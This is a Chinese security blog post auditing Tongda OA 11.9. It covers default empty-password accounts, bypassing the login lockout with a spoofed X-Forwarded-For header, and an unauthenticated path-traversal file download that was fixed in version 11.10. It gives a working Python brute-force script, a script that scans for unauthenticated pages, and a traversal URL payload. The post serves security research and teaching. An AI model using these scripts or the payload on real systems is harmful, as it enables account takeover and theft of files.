某OA 审计小记

admin

140325
文章

117
评论

2023年2月21日15:59:14评论54 views字数 2776阅读9分15秒阅读模式

通达oa 作为攻防演练中出场率较高的一套 OA 系统，决定先从历史漏洞开始挖掘分析，对通达oa 有一个初步的了解

通达oa 11.9 的下载地址默认安装地址是 D:MYOA 联网状态下会自动更新到通达 oa 11.10

安装成功后，登录界面如下默认账号为 admin 对应密码为空

某OA 审计小记

登录后我们看到其中还有一些默认账号 lijia wangyun wangde 均可利用空密码登录成功

某OA 审计小记

爆破密码

正常输入账号名密码时，输入三次错误就会禁止10分钟

某OA 审计小记

我们可以通过代码方面追究其原因

webroot/inc/td_core.php

某OA 审计小记

$USER_IP 的值可以来自于 X-Forwarded-For

写个 python 脚本用于爆破用户名密码

某OA 审计小记

import requestsimport sysimport re
def read_passwd(passwordfile):    withopen(file = passwordfile, mode='r') as f:        passwd = f.read().splitlines()        return passwd 
def Intruder_password(url,username,passwd_list):    success_str ="正在进入OA系统，请稍候..."    a=b=c=d=0    url = url +"/logincheck.php"    for passwd in passwd_list:        payload ="UNAME={}&PASSWORD={}&encode_type=1".format(username,passwd)        headers = { "X-Forwarded-For": "{}.{}.{}.{}".format(a,b,c,d),"Content-Type": "application/x-www-form-urlencoded"}        response = requests.request("POST", url, data=payload, headers=headers)        if(re.search(success_str, response.text)):            print("正确的账号名:{}密码:{}".format(username,passwd))        else:            print("错误密码:{}".format(passwd))        d=d+1        if(d ==255):            c = c +1            d =0        if(c ==255):            b = b +1            c =0        if(b ==255):            a = a +1            b =0

def main():    iflen(sys.argv) <4:        print("Usage: Intruder_password.py  targeturl username passwdfilen"              "Example: python Intruder_password.py http://10.0.18.1:80 admin passwd.txt")        exit()    url = sys.argv[1]    username = sys.argv[2]    passwd_list = read_passwd(sys.argv[3])    Intruder_password(url,username,passwd_list)
if__name__=='__main__':    main()

未授权敏感信息泄露

一般我们想要寻找一些高危的漏洞，就是需要寻找一些未授权漏洞，就是在未登录状态下也可以执行授权后的相关功能，编写了一个简单的脚本，先判断哪一些网页是可以在未授权的情况下进行访问到，然后再做进一步的分析

import osimport sysimport requests
def file_path(url,filefolder):    for root, dirs, files in os.walk(filefolder):        for f in files:            paths = os.path.join(root,f)            paths = paths.replace(filefolder,url)            paths = paths.replace("\","/")            #print(paths)             if(f.endswith(".php")):                response = requests.get(paths)                # print(str(response.status_code)+" "+str(len(response.text))+"  "+paths)                print("code:"+str(response.status_code) +" len:"+str(len(response.text))+" url: "+ paths )

def main():    iflen(sys.argv) <3:        print("Usage: file_path.py targeturl filefoldern"              "Example: python file_path.py http://10.0.18.1:80 "C:\Users\admin\Desktop\MYOA\webroot"")        exit()    url = sys.argv[1]    filefolder = sys.argv[2]    file_path(url,filefolder)

if__name__=='__main__':    main()

http://10.0.18.1/inc/reg.php 泄露版本信息

某OA 审计小记

还有很多可以未授权显示的页面，不一一展示了

未授权文件下载

通过不断测试，也找到了一个比较有价值的漏洞，就是未授权文件下载

构造链接 http://10.0.18.1/inc/package/down.php?id=/../../../../../../../../../a

某OA 审计小记

就可以下载到根目录下的 a.zip 文件

某OA 审计小记

我们从代码层面分析一下漏洞的成因

webroot/inc/package/down.php

某OA 审计小记

我们看到通过 GET 方法获取到 id 值，拼接到 $FILE_PATH 中，并没有做任何过滤，传到函数 td_download 中

webroot/inc/utility_file.php

某OA 审计小记

如此便实现了任意文件下载，这是在版本 11.09 中存在的漏洞，在自动更新到 11.10 后漏洞便被修复了，我们查看一下代码

webroot/inc/package/down.php 我们看到对传入的参数进行了过滤，无法再跨越目录的进行下载

某OA 审计小记

实验推荐

代码审计利器-RIPS实践
链接：https://www.hetianlab.com/expc.do?ec=ECIDb9ac-4540-46b4-b676-22df36b5935b

原创稿件征集

征集原创技术文章中，欢迎投递

投稿邮箱：[email protected]

文章类型：黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情，点我查看！

靶场实操，戳“阅读原文“

原文始发于微信公众号（合天网安实验室）：某OA 审计小记

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

某OA 审计小记

某OA代码审计之挖掘0day，未公开poc

某CRM系统前台RCE漏洞

一次某info开源系统漏洞挖掘

Java代码审计鉴权绕过

记某微聊源码代码审计过程

【PHP代审】最新PHP礼品卡回收商城

Nacos Derby RCE代码审计

审计分析 | 某次.NET源码的前台漏洞审计流程

FastJSON 安全审计简洁实用指南：黑盒免测也能揪出漏洞

JAVA代审之XSS漏洞

发表评论

在线咨询

微信